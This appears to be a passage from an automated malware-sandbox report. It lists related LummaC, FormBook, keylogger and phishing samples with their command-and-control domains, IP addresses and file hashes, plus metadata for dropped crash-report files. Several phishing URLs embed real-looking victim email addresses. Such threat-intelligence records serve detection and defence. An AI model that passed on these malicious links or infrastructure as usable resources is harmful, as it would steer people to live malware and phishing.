                                                                                    • 863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
                                                                                    10092024150836 09.10.2024.vbeGet hashmaliciousFormBookBrowse
                                                                                    • www.airgame.store/ojib/
                                                                                    Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.cc101.pro/59fb/
                                                                                    octux.exe.exeGet hashmaliciousUnknownBrowse
                                                                                    • servicetelemetryserver.shop/api/index.php
                                                                                    bX8NyyjOFz.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rtprajalojago.live/2uvi/
                                                                                    lWfpGAu3ao.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.serverplay.live/71nl/
                                                                                    sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.cc101.pro/0r21/
                                                                                    E_receipt.vbsGet hashmaliciousUnknownBrowse
                                                                                    • paste.ee/d/VO2TX
                                                                                    QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • filetransfer.io/data-package/fOmsJ2bL/download
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    drawwyobstacw.sbsSetup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.97.3
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.97.3
                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.96.3
                                                                                    WxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.97.3
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.96.3
                                                                                    Setup-Premium.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.96.3
                                                                                    Solara.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.96.3
                                                                                    Loader.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.96.3
                                                                                    Wintohdd.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.96.3
                                                                                    670937a58778f_LisioFirendes.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.96.3
                                                                                    condifendteu.sbsSetup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.79.35
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.79.35
                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.141.136
                                                                                    WxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.141.136
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.79.35
                                                                                    Setup-Premium.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.79.35
                                                                                    Solara.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.141.136
                                                                                    Loader.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.79.35
                                                                                    Wintohdd.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.141.136
                                                                                    670937a58778f_LisioFirendes.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.79.35
                                                                                    vennurviot.sbsSetup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.140.193
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.140.193
                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.140.193
                                                                                    WxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.46.170
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.140.193
                                                                                    Setup-Premium.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.140.193
                                                                                    Solara.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.140.193
                                                                                    Loader.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.140.193
                                                                                    Wintohdd.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.140.193
                                                                                    670937a58778f_LisioFirendes.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.140.193
                                                                                    steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    mathcucom.sbsSetup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.97.3
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.96.3
                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.96.3
                                                                                    WxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.97.3
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.97.3
                                                                                    Setup-Premium.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.96.3
                                                                                    Solara.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.97.3
                                                                                    Loader.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.96.3
                                                                                    Wintohdd.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.96.3
                                                                                    670937a58778f_LisioFirendes.exeGet hashmaliciousLummaCBrowse
                                                                                    • 188.114.96.3
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CLOUDFLARENETUSCompliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.17.25.14
                                                                                    https://aa.ns.agingbydesignministry.org/?company=john_smith@company.com/1/01020192845e78dd-2d6e57c1-2477-4368-9808-e405234d7366-000000/JciFxQG6yOVw83-lKIliC63cjw4=395Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 1.1.1.1
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.206.204
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.206.204
                                                                                    rPayment_slip.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.53.8
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.206.204
                                                                                    https://60ms64xz.r.eu-west-1.awstrack.me/L0/https:%2F%2Fnym1-ib.adnxs.com%2Fclick2%3Fe=wqT_3QKhAfCBoQAAAAMAxBkFAQj1xf22BhCN5rHDq8rIsXYY6OvVqs3R1c9aIPXtswsoykEwhx04AkDV-qXwAUiY1VJQAFoDVVNEYgNVU0RorAJw-gF4kfdrgAG5zAOIAQGQAQGYAQWgAQKpAVM7_DVZo44_sQHWE0zrJXyFP7kBAAAAwMzM7D_BAREUDMkBUDsJKDDYAQDgAQDwAdEO-AEA%2Fs=555aa6e5683ce51c048a98b83e6a923b5a8d9a2c%2Fbcr=AAAAAAAA8D8=%2Fcnd=%25218hVjbgiv18IdENX6pfABGJjVUiAAKAAxmpmZmZmZuT86CU5ZTTI6NTI1NECoR0kAAAAAAADwP1EAAAAAAAAAAFkAAAAAAAAAAGEAAAAAAAAAAGkAAAAAAAAAAHEAAAAAAAAAAHgAiQEAAAAAAADwPw..%2Fcca=MzcxOSNOWU0yOjUyNTQ=%2Fbn=58937%2Fclickenc=http%253A%252F%252Faa.ns.agingbydesignministry.org%3FMlcinsurance=grant.harpur@mlcinsurance.com.au/1/0102019284444055-c8ec5399-450a-413f-acab-546e07ef32e7-000000/Qxx4uNY6H1RoEfFUkvzFba2SPik=395Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 1.1.1.1
                                                                                    http://painel.simpatiafm.com.br/Get hashmaliciousUnknownBrowse
                                                                                    • 162.247.243.29
                                                                                    SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.86.8
                                                                                    CLOUDFLARENETUSCompliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.17.25.14
                                                                                    https://aa.ns.agingbydesignministry.org/?company=john_smith@company.com/1/01020192845e78dd-2d6e57c1-2477-4368-9808-e405234d7366-000000/JciFxQG6yOVw83-lKIliC63cjw4=395Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 1.1.1.1
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.206.204
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.206.204
                                                                                    rPayment_slip.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.53.8
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.206.204
                                                                                    https://60ms64xz.r.eu-west-1.awstrack.me/L0/https:%2F%2Fnym1-ib.adnxs.com%2Fclick2%3Fe=wqT_3QKhAfCBoQAAAAMAxBkFAQj1xf22BhCN5rHDq8rIsXYY6OvVqs3R1c9aIPXtswsoykEwhx04AkDV-qXwAUiY1VJQAFoDVVNEYgNVU0RorAJw-gF4kfdrgAG5zAOIAQGQAQGYAQWgAQKpAVM7_DVZo44_sQHWE0zrJXyFP7kBAAAAwMzM7D_BAREUDMkBUDsJKDDYAQDgAQDwAdEO-AEA%2Fs=555aa6e5683ce51c048a98b83e6a923b5a8d9a2c%2Fbcr=AAAAAAAA8D8=%2Fcnd=%25218hVjbgiv18IdENX6pfABGJjVUiAAKAAxmpmZmZmZuT86CU5ZTTI6NTI1NECoR0kAAAAAAADwP1EAAAAAAAAAAFkAAAAAAAAAAGEAAAAAAAAAAGkAAAAAAAAAAHEAAAAAAAAAAHgAiQEAAAAAAADwPw..%2Fcca=MzcxOSNOWU0yOjUyNTQ=%2Fbn=58937%2Fclickenc=http%253A%252F%252Faa.ns.agingbydesignministry.org%3FMlcinsurance=grant.harpur@mlcinsurance.com.au/1/0102019284444055-c8ec5399-450a-413f-acab-546e07ef32e7-000000/Qxx4uNY6H1RoEfFUkvzFba2SPik=395Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 1.1.1.1
                                                                                    http://painel.simpatiafm.com.br/Get hashmaliciousUnknownBrowse
                                                                                    • 162.247.243.29
                                                                                    SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.86.8
                                                                                    CLOUDFLARENETUSCompliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.17.25.14
                                                                                    https://aa.ns.agingbydesignministry.org/?company=john_smith@company.com/1/01020192845e78dd-2d6e57c1-2477-4368-9808-e405234d7366-000000/JciFxQG6yOVw83-lKIliC63cjw4=395Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 1.1.1.1
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.206.204
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.206.204
                                                                                    rPayment_slip.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.53.8
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.206.204
                                                                                    https://60ms64xz.r.eu-west-1.awstrack.me/L0/https:%2F%2Fnym1-ib.adnxs.com%2Fclick2%3Fe=wqT_3QKhAfCBoQAAAAMAxBkFAQj1xf22BhCN5rHDq8rIsXYY6OvVqs3R1c9aIPXtswsoykEwhx04AkDV-qXwAUiY1VJQAFoDVVNEYgNVU0RorAJw-gF4kfdrgAG5zAOIAQGQAQGYAQWgAQKpAVM7_DVZo44_sQHWE0zrJXyFP7kBAAAAwMzM7D_BAREUDMkBUDsJKDDYAQDgAQDwAdEO-AEA%2Fs=555aa6e5683ce51c048a98b83e6a923b5a8d9a2c%2Fbcr=AAAAAAAA8D8=%2Fcnd=%25218hVjbgiv18IdENX6pfABGJjVUiAAKAAxmpmZmZmZuT86CU5ZTTI6NTI1NECoR0kAAAAAAADwP1EAAAAAAAAAAFkAAAAAAAAAAGEAAAAAAAAAAGkAAAAAAAAAAHEAAAAAAAAAAHgAiQEAAAAAAADwPw..%2Fcca=MzcxOSNOWU0yOjUyNTQ=%2Fbn=58937%2Fclickenc=http%253A%252F%252Faa.ns.agingbydesignministry.org%3FMlcinsurance=grant.harpur@mlcinsurance.com.au/1/0102019284444055-c8ec5399-450a-413f-acab-546e07ef32e7-000000/Qxx4uNY6H1RoEfFUkvzFba2SPik=395Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 1.1.1.1
                                                                                    http://painel.simpatiafm.com.br/Get hashmaliciousUnknownBrowse
                                                                                    • 162.247.243.29
                                                                                    SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.86.8
                                                                                    CLOUDFLARENETUSCompliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.17.25.14
                                                                                    https://aa.ns.agingbydesignministry.org/?company=john_smith@company.com/1/01020192845e78dd-2d6e57c1-2477-4368-9808-e405234d7366-000000/JciFxQG6yOVw83-lKIliC63cjw4=395Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 1.1.1.1
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.206.204
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.206.204
                                                                                    rPayment_slip.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.53.8
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.206.204
                                                                                    https://60ms64xz.r.eu-west-1.awstrack.me/L0/https:%2F%2Fnym1-ib.adnxs.com%2Fclick2%3Fe=wqT_3QKhAfCBoQAAAAMAxBkFAQj1xf22BhCN5rHDq8rIsXYY6OvVqs3R1c9aIPXtswsoykEwhx04AkDV-qXwAUiY1VJQAFoDVVNEYgNVU0RorAJw-gF4kfdrgAG5zAOIAQGQAQGYAQWgAQKpAVM7_DVZo44_sQHWE0zrJXyFP7kBAAAAwMzM7D_BAREUDMkBUDsJKDDYAQDgAQDwAdEO-AEA%2Fs=555aa6e5683ce51c048a98b83e6a923b5a8d9a2c%2Fbcr=AAAAAAAA8D8=%2Fcnd=%25218hVjbgiv18IdENX6pfABGJjVUiAAKAAxmpmZmZmZuT86CU5ZTTI6NTI1NECoR0kAAAAAAADwP1EAAAAAAAAAAFkAAAAAAAAAAGEAAAAAAAAAAGkAAAAAAAAAAHEAAAAAAAAAAHgAiQEAAAAAAADwPw..%2Fcca=MzcxOSNOWU0yOjUyNTQ=%2Fbn=58937%2Fclickenc=http%253A%252F%252Faa.ns.agingbydesignministry.org%3FMlcinsurance=grant.harpur@mlcinsurance.com.au/1/0102019284444055-c8ec5399-450a-413f-acab-546e07ef32e7-000000/Qxx4uNY6H1RoEfFUkvzFba2SPik=395Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 1.1.1.1
                                                                                    http://painel.simpatiafm.com.br/Get hashmaliciousUnknownBrowse
                                                                                    • 162.247.243.29
                                                                                    SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.86.8
                                                                                    CLOUDFLARENETUSCompliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.17.25.14
                                                                                    https://aa.ns.agingbydesignministry.org/?company=john_smith@company.com/1/01020192845e78dd-2d6e57c1-2477-4368-9808-e405234d7366-000000/JciFxQG6yOVw83-lKIliC63cjw4=395Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 1.1.1.1
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.206.204
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.206.204
                                                                                    rPayment_slip.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 188.114.96.3
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.53.8
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.206.204
                                                                                    https://60ms64xz.r.eu-west-1.awstrack.me/L0/https:%2F%2Fnym1-ib.adnxs.com%2Fclick2%3Fe=wqT_3QKhAfCBoQAAAAMAxBkFAQj1xf22BhCN5rHDq8rIsXYY6OvVqs3R1c9aIPXtswsoykEwhx04AkDV-qXwAUiY1VJQAFoDVVNEYgNVU0RorAJw-gF4kfdrgAG5zAOIAQGQAQGYAQWgAQKpAVM7_DVZo44_sQHWE0zrJXyFP7kBAAAAwMzM7D_BAREUDMkBUDsJKDDYAQDgAQDwAdEO-AEA%2Fs=555aa6e5683ce51c048a98b83e6a923b5a8d9a2c%2Fbcr=AAAAAAAA8D8=%2Fcnd=%25218hVjbgiv18IdENX6pfABGJjVUiAAKAAxmpmZmZmZuT86CU5ZTTI6NTI1NECoR0kAAAAAAADwP1EAAAAAAAAAAFkAAAAAAAAAAGEAAAAAAAAAAGkAAAAAAAAAAHEAAAAAAAAAAHgAiQEAAAAAAADwPw..%2Fcca=MzcxOSNOWU0yOjUyNTQ=%2Fbn=58937%2Fclickenc=http%253A%252F%252Faa.ns.agingbydesignministry.org%3FMlcinsurance=grant.harpur@mlcinsurance.com.au/1/0102019284444055-c8ec5399-450a-413f-acab-546e07ef32e7-000000/Qxx4uNY6H1RoEfFUkvzFba2SPik=395Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 1.1.1.1
                                                                                    http://painel.simpatiafm.com.br/Get hashmaliciousUnknownBrowse
                                                                                    • 162.247.243.29
                                                                                    SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.86.8
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.53.8
                                                                                    • 188.114.96.3
                                                                                    • 172.67.152.13
                                                                                    • 104.21.30.221
                                                                                    • 172.67.141.136
                                                                                    • 104.102.49.254
                                                                                    • 104.21.28.222
                                                                                    • 172.67.205.156
                                                                                    • 104.21.46.170
                                                                                    FACTURA.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                    • 104.21.53.8
                                                                                    • 188.114.96.3
                                                                                    • 172.67.152.13
                                                                                    • 104.21.30.221
                                                                                    • 172.67.141.136
                                                                                    • 104.102.49.254
                                                                                    • 104.21.28.222
                                                                                    • 172.67.205.156
                                                                                    • 104.21.46.170
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.53.8
                                                                                    • 188.114.96.3
                                                                                    • 172.67.152.13
                                                                                    • 104.21.30.221
                                                                                    • 172.67.141.136
                                                                                    • 104.102.49.254
                                                                                    • 104.21.28.222
                                                                                    • 172.67.205.156
                                                                                    • 104.21.46.170
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.53.8
                                                                                    • 188.114.96.3
                                                                                    • 172.67.152.13
                                                                                    • 104.21.30.221
                                                                                    • 172.67.141.136
                                                                                    • 104.102.49.254
                                                                                    • 104.21.28.222
                                                                                    • 172.67.205.156
                                                                                    • 104.21.46.170
                                                                                    20Listen.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.21.53.8
                                                                                    • 188.114.96.3
                                                                                    • 172.67.152.13
                                                                                    • 104.21.30.221
                                                                                    • 172.67.141.136
                                                                                    • 104.102.49.254
                                                                                    • 104.21.28.222
                                                                                    • 172.67.205.156
                                                                                    • 104.21.46.170
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.53.8
                                                                                    • 188.114.96.3
                                                                                    • 172.67.152.13
                                                                                    • 104.21.30.221
                                                                                    • 172.67.141.136
                                                                                    • 104.102.49.254
                                                                                    • 104.21.28.222
                                                                                    • 172.67.205.156
                                                                                    • 104.21.46.170
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.53.8
                                                                                    • 188.114.96.3
                                                                                    • 172.67.152.13
                                                                                    • 104.21.30.221
                                                                                    • 172.67.141.136
                                                                                    • 104.102.49.254
                                                                                    • 104.21.28.222
                                                                                    • 172.67.205.156
                                                                                    • 104.21.46.170
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.53.8
                                                                                    • 188.114.96.3
                                                                                    • 172.67.152.13
                                                                                    • 104.21.30.221
                                                                                    • 172.67.141.136
                                                                                    • 104.102.49.254
                                                                                    • 104.21.28.222
                                                                                    • 172.67.205.156
                                                                                    • 104.21.46.170
                                                                                    SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.53.8
                                                                                    • 188.114.96.3
                                                                                    • 172.67.152.13
                                                                                    • 104.21.30.221
                                                                                    • 172.67.141.136
                                                                                    • 104.102.49.254
                                                                                    • 104.21.28.222
                                                                                    • 172.67.205.156
                                                                                    • 104.21.46.170
                                                                                    SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.53.8
                                                                                    • 188.114.96.3
                                                                                    • 172.67.152.13
                                                                                    • 104.21.30.221
                                                                                    • 172.67.141.136
                                                                                    • 104.102.49.254
                                                                                    • 104.21.28.222
                                                                                    • 172.67.205.156
                                                                                    • 104.21.46.170
                                                                                    No context
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):65536
                                                                                    Entropy (8bit):1.1027660022791612
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:PK2NTP1il0BU/4jGmDEDHxzuiFUZ24IO8C3:HJiGBU/4jxQxzuiFUY4IO8C3
                                                                                    MD5:28B7E1CA584575750BDA56B7C9360468
                                                                                    SHA1:601EDE8BA8DDD851E82A685EF32C9BCE1C000033
                                                                                    SHA-256:B1F73C39B5E122CD2C38D65E5B8031535D5BA577AB8E15D56834CCC21114C3DF
                                                                                    SHA-512:A68EF06ABA1E18C6F6BBF02E250E6DA70125D96B5DFAFA5804AEDC47717F8D5E68C1CB9A59F2C59A5A1D5C6AE843443C305DFE2D42BA3080F6766DF4FA9858C3
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.4.8.4.7.2.9.3.5.2.5.9.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.3.4.8.4.7.3.8.5.7.1.2.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.2.e.0.7.b.e.-.d.2.d.a.-.4.2.0.e.-.a.b.3.5.-.b.2.7.4.9.b.4.2.a.d.f.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.8.1.a.d.8.0.9.-.c.0.c.0.-.4.e.1.f.-.a.4.7.4.-.f.9.c.f.9.c.5.b.d.a.3.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.a.s.p.n.e.t._.r.e.g.i.i.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.s.p.n.e.t._.r.e.g.i.i.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.1.8.-.0.0.0.1.-.0.0.1.4.-.4.3.4.c.-.3.8.4.c.e.5.1.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.c.5.5.8.f.0.e.8.4.2.c.4.3.e.6.b.3.b.c.0.6.6.9.1.6.b.2.
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:Mini DuMP crash report, 15 streams, Mon Oct 14 03:01:13 2024, 0x1205a4 type
                                                                                    Category:dropped
                                                                                    Size (bytes):116178
                                                                                    Entropy (8bit):2.1271325999158908
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:5XPjnkQH8kB7FxHssR1pGIm3BerwCR5lBqhKWZ60KUkJB7S0:5rkq8kB7HHssR7rm3ErmZmtJ00
                                                                                    MD5:BCFF99A40088882398D771769ADC04BD
                                                                                    SHA1:198D6609C10BA568265583BD470258145F6D6A03
                                                                                    SHA-256:F59A468DD20146B69B7447BA441012BAAC25C1639868807C9949E7D732EB23DC
                                                                                    SHA-512:703BD2367C1BCA6CCD59E0737CB2DEAF69332D48AAD681C6BCE1D16352474B7F658E638F928589388415D6F666E3CCB8001182B1C4632F285961AE49018CF26F
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:MDMP..a..... .......y..g.........................................!..........DJ..........`.......8...........T...........H@..............4".......... $..............................................................................eJ.......$......GenuineIntel............T...........l..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):8314
                                                                                    Entropy (8bit):3.688748661824445
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:R6l7wVeJia6d6YYV6tgmfvPprU89baQsfxem:R6lXJH6d6YC6tgmfvjajfx
                                                                                    MD5:A4F6D76E811215507E029725C2B41334
                                                                                    SHA1:AC74F1CC95C7F7E3DE0AAB92F749193884AC56BF
                                                                                    SHA-256:D7F1342E6AA35D60F68056C9BA1156813210ADB10C842648C0D449CC36575460
                                                                                    SHA-512:040B5ECFB5831C8362FE8838435980B954C48E2F839CEB2F84CD7B6F81D038ADF8881C2305F71BF61B2A787A34CDD71BC26D4B8207A0B44B7B854EAACAB3375D
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.8.0.<./.P.i.d.
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
